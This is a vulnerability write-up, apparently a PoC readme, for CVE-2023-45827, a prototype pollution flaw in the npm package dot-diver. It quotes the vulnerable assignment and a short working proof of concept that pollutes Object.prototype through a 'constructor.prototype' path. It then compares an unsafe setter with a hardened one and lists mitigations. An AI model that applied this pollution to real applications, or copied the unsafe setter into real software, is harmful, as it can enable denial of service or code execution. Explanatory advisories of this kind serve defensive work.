CVE-2023-45827 PoC — Dot diver security vulnerability

Source
Associated Vulnerability
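Title: Dot diver security vulnerability (CVE-2023-45827)
Description: Dot diver is a lightweight, powerful, dependency-free TypeScript utility library that provides types and functions for working with object paths in dot notation. Versions of Dot diver before 1.0.2 contain a security vulnerability. An attacker can exploit this vulnerability to execute code remotely.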
Description
pp
Readme
# CVE-2023-45827



## Vulnerability overview

- CVE-2023-45827

- CVSS : 9.8

- Nov 3, 2023

- Prototype Pollution in a Node.js package

- Part of the rebob project

## Vulnerability description

[github advisories](https://github.com/clickbar/dot-diver/security/advisories/GHSA-9w5f-mw3p-pj47)

This is a Prototype Pollution (PP) vulnerability in dot-diver. It can lead to RCE.


**vulnerable code**

```
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
//eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value
```
**poc**

```
import { getByPath, setByPath } from '@clickbar/dot-diver'

console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo
```

This is Prototype Pollution (PP), and it can lead to DoS, RCE, etc.
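
The unsafe assignment pattern shown above next to a guarded setter, as an added example that is neither dot-diver's code nor its 1.0.2 patch. The names `BLOCKED_KEYS`, `unsafeSetByPath`, `safeSetByPath` and `demo` are hypothetical, and the guard shown is one common mitigation (segment denylist plus own-property traversal).

```javascript
// Added example, not dot-diver's code: all names here are hypothetical.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
// Unsafe pattern: walks every segment, inherited ones included, then assigns.
function unsafeSetByPath(obj, path, value) {
  const keys = path.split('.');
  const lastKey = keys.pop();
  let target = obj;
  for (const key of keys) target = target[key];
  target[lastKey] = value; // same shape as `objectToSet[lastKey] = value`
}

// Hardened form: reject prototype-reaching segments, walk own properties only.
function safeSetByPath(obj, path, value) {
  const keys = path.split('.');
  if (keys.some((key) => BLOCKED_KEYS.has(key))) {
    throw new Error(`unsafe path segment in "${path}"`);
  }
  const lastKey = keys.pop();
  let target = obj;
  for (const key of keys) {
    if (!Object.prototype.hasOwnProperty.call(target, key)) {
      target[key] = {}; // create missing levels, never follow the prototype chain
    }
    target = target[key];
    if (target === null || typeof target !== 'object') {
      throw new TypeError(`"${key}" in "${path}" is not an object`);
    }
  }
  target[lastKey] = value;
  return obj;
}

// Runs both setters against the path from the PoC and reports what happened.
function demo() {
  const result = {};
  unsafeSetByPath({}, 'constructor.prototype.polluted', 'foo');
  result.unsafePolluted = {}.polluted === 'foo';
  delete Object.prototype.polluted; // undo the pollution before the next check
  try {
    safeSetByPath({}, 'constructor.prototype.polluted', 'foo');
    result.safeRejected = false;
  } catch {
    result.safeRejected = true;
  }
  result.safePolluted = 'polluted' in {};
  result.normalWrite = safeSetByPath({}, 'a.b.c', 1).a.b.c;
  return result;
}
console.log(demo());
```

Code that cannot change the setter can also build its target objects with `Object.create(null)` or freeze `Object.prototype` at startup, which limits what a polluted path can reach.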


[target package](https://www.npmjs.com/package/@clickbar/dot-diver)